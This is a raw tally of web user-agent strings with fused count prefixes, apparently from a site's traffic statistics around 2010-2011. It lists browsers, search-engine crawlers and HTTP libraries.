463461Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
461447Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
461460Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
459369Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
456423Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
455455Cityreview Robot (+http://www.cityreview.org/crawler/)
454454Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 3 subscribers; feed-id=1942867011920659746)
452433Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
452445Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
451448Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
447431Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
447447DoCoMo/2.0 P900i(c100;TB;W24H11)(compatible; ichiro/mobile goo;+http://help.goo.ne.jp/door/crawler.html)
447414Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
447149Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; BRI/1; AskTbWCL2/5.12.2.16749)
447443Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)
443411Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
442426websucker/1.10
442395Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 (.NET CLR 3.5.30729)
441441Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.3)
441417Mozilla/4.0 (compatible; MSIE 4.0; Windows NT; ....../1.0 )
441423Mozilla/5.0 (Windows NT 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
440427Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
440373Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
438421Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)
438430Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
436436ColdFusion
436388Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
436432Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
432432Java/1.6.0_24
427405Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
426389Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
423405Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)
423412Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.3; .NET CLR 1.1.4322)
421418Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C)
420370education portal/Nutch-0.9 (Please do not forbid, its for your benefit)
419408Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
417417larbin_2.6.3 atat@cs.bilkent.edu.tr
417399Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; IEMB3)
416368Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
415394Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17
414413Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
414402Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
412405Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
412405Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
411408Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3
411387Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
409371Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)
408397Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
407397Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11
406402Java/1.4.2_09
405342Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
405400Java/1.5.0_02
403380Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10
403387Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
403362Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; FunWebProducts)
402390Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
402402LexxeBot/1.0 (lexxebot@lexxe.com)
402395Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
402379Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
401401MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
400390Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
396387Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; (R1 1.5); InfoPath.1)
396389Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
396396Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; YPC 3.0.3; .NET CLR 1.1.4322 yplus 4.1.00b)
395372Python-webchecker/1.30
393390Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows 98)
391375Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5
390374Mozilla/5.0 (Windows NT 6.0; rv:5.0) Gecko/20100101 Firefox/5.0
390379Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
389387Mozilla/2.0 (compatible; MSIE 3.0B; Windows NT)
387362Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
387358Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
387386Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061023 SUSE/2.0.0.4-1.1 Firefox/2.0.0.4
386368Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
385384Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
385380Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
384384Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; (R1 1.5); InfoPath.1)
384347Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)
382367Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/4.1.3 Safari/533.19.4
382279Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; InfoPath.2)
381306Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
379375Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02
379375Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; yplus 5.1.04b)
378378Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
378355Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5
375366Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
375368Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
373371Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30
373371Java/1.6.0_05
372372Toata dragostea mea pentru iEdi
372369Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
370365Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
368353egothor/7.0c (+http://www.egothor.org/robot.html)
367284Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9
367364Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8
366365Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
366348Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C)
365365Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; yplus 5.1.04b)
364351Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))
364360Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0)
363363libwww-perl/5.834
363359MJ12bot/v1.2.0 (http://majestic12.co.uk/bot.php?+)
360345Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0C)
359359larbin_2.6.3 larbin2.6.3@unspecified.mail
358354Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AT&T CSM8.1; .NET CLR 1.1.4322)
356351Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
356126Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
355349Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C)
355347Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
355354Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sbcydsl 3.12; SV1; yplus 3.01)
354354Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; iebar; FunWebProducts; SV1; .NET CLR 1.0.3705)
354310Mozilla/5.0 (compatible; heritrix/1.8.0 +http://www.accelobot.com)
353353Mozilla/5.0 (Windows;) NimbleCrawler 2.0.2 obeys UserAgent NimbleCrawler For problems contact: crawler@healthline.com
353257Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.5)
353349Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; sbcydsl 3.12; YComp 5.0.0.0; .NET CLR 1.1.4322)
351346Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
350322Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
349346Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; .NET CLR 1.1.4322 yplus 4.1.00b)
349348Nutraspace/Nutch-1.2 (www.nutraspace.com)
349328Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
349331Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
347347Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
347318Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
346287Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; atyinst(ihp))
346337Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.searchme.com/support/)
346344Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; yie6_SBC; YPC 3.0.0)
345345disco/Nutch-1.0-dev (experimental crawler; www.discoveryengine.com; disco-crawl@discoveryengine.com)
345262Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 ( .NET CLR 3.5.30729)
343247Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://)
341330Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30
338338Mozilla/4.0 (compatible; Synapse)
338298Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
338314yacybot (i386 Linux 2.6.22-14-generic; java 1.5.0_13; Europe/en) http://yacy.net/bot.html
337315NutchCVS/0.7.2 (Nutch; http://lucene.apache.org/nutch/bot.html; nutch-agent@lucene.apache.org)
337328Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)
337337Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; (R1 1.5); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET4.0C; .NET4.0E)
337244Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; InfoPath.2; .NET4.0C)
337328Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5
336336FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)
335329Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)
335330Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
334287Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C)
33431Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)
334298Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)
333306Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
333316Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0C)
333333Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)
332312Firefox/1.0 (Windows; U; Win98; en-US; Localization; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
332321Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 ( .NET CLR 3.5.30729)
328307Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
328328Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; feed-id=16052364276736413973)
327327Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; SV1; .NET CLR 1.1.4322)
326323Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
326314Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
326324Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)
325324Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; yplus 4.1.00b)
325310Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
324323Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SpamBlockerUtility 4.8.4)
324308Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
324322Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2
323320Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3
323321Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1; .NET CLR 1.1.4322)
323237Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; InfoPath.2)
322262Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
321313Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
320277Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
320307Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SIMBAR Enabled)
319319Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
318309Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
314289Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; GTB6.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
313313Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; FunWebProducts; .NET CLR 1.1.4322)
313191Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 ( .NET CLR 3.5.30729)
311160Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.0.30618; .NET CLR 3.5.30729; MDDC; AskTB5.6)
311265Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
311311dragonfly(ebingbong@playstarmusic.com)
309304Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
308308Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/2007030919 Firefox/2.0.0.3
306303Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
306290Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
305303Mozilla/4.0 (compatible; MSIE 6.0; Win32)
304259yacybot (i386 Linux 2.4.27-3-686-smp; java 1.5.0_07; MET/en) http://yacy.net/bot.html
304304Speedy Spider (Entireweb; Beta/1.0; http://www.entireweb.com/about/search_tech/speedyspider/)
303298Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/4.1.3 Safari/533.19.4
303294Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
302291Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
302297Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
302294Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 ( .NET CLR 3.5.30729)
302301Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; yplus 5.1.04b)
301296Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16; .NET4.0C)
301228Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
301237Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
301297Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041217
300139Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)
300299Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)
300289Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3
299289Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)
299296Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; InfoPath.2)
298295Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
297293Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
296296Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MySpace;; .NET4.0C; yie8)
295295Mozilla/5.0 (Windows;) NimbleCrawler 2.0.1 obeys UserAgent NimbleCrawler For problems contact: crawler@healthline.com
294293Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; yplus 4.1.00b)
293282Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.9 (KHTML, like Gecko) Safari/312.6
293288Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; InfoPath.2)
293209Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDC; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
292292Mozilla/5.0 (compatible; iaskspider/1.0; MSIE 6.0)
292292IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)
292212Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
291286Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
